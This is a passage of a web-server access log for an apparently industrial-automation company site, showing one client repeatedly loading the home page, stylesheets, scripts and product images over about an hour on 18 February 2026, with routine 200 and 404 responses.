(KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/images/icons/icons.svg" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/images/icons/icons.svg" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10543] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:05:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/images/icons/icons.svg" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:05:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10526] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:08:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:08:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:08:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:08:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:08:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10531] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:10:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:10:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10528] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:11:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:11:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:51:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10528] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:11:51:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" 